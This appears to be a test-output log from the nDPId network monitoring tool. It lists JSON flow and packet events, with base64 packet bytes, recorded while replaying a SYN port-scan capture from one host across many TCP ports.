+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAs1pwAADMGPtasEAAIQA2GNIzSAEbdUoMYAAAAAGACEAAoSQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsCvQAAC8GDn+sEAAIQA2GNIzSB9PdUoMYAAAAAGACEAAgvAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsEhYAADIGBF2sEAAIQA2GNIzSBAbdUoMYAAAAAGACDAAoiQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsysMAADYGR6+sEAAIQA2GNIzSAh\/dUoMYAAAAAGACDAAqcAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAshYsAADUGjeesEAAIQA2GNIzSBGzdUoMYAAAAAGACCAAsIwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsx5MAACYGWt+sEAAIQA2GNIzS\/G\/dUoMYAAAAAGACDAAwHwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsd4EAAC8GofGsEAAIQA2GNIzSF3fdUoMYAAAAAGACEAARGAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsV8MAADAGwK+sEAAIQA2GNIzSDOTdUoMYAAAAAGACBAAnqwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsDVUAACcGFB6sEAAIQA2GNIzSAN7dUoMYAAAAAGACEAAnsQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsTlwAADEGyRasEAAIQA2GNIzSIALdUoMYAAAAAGACCAAQjQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsKmwAACoG9AasEAAIQA2GNIzSKYTdUoMYAAAAAGACDAADCwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAscZcAACYGsNusEAAIQA2GNIzSEVzdUoMYAAAAAGACDAAbMwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAslUQAADkGei6sEAAIQA2GNIzSAE\/dUoMYAAAAAGACCAAwQAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsfT0AADYGlTWsEAAIQA2GNIzSHwLdUoMYAAAAAGACDAANjQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAseaIAAC4GoNCsEAAIQA2GNIzSBAjdUoMYAAAAAGACDAAohwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsHtMAACcGAqCsEAAIQA2GNIzTCEfdU4MZAAAAAGACEAAgRQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsp1MAACsGdh+sEAAIQA2GNIzTH5XdU4MZAAAAAGACEAAI9wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsELoAACkGDrmsEAAIQA2GNIzTFTjdU4MZAAAAAGACCAAbVAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsMaIAACcG79CsEAAIQA2GNIzTEV7dU4MZAAAAAGACEAAXLgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAszmMAADAGSg+sEAAIQA2GNIzTBFLdU4MZAAAAAGACBAAwOgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsr3kAADcGYfmsEAAIQA2GNIzTCGDdU4MZAAAAAGACEAAgLAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsoj0AACUGgTWsEAAIQA2GNIzTF0jdU4MZAAAAAGACCAAZRAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsj+cAACkGj4usEAAIQA2GNIzTBHLdU4MZAAAAAGACCAAsGgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsL4YAADsG3eysEAAIQA2GNIzTB\/rdU4MZAAAAAGACEAAgkgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsgXEAACcGoAGsEAAIQA2GNIzTABPdU4MZAAAAAGACEAAoeQAAAgQFtA=="} 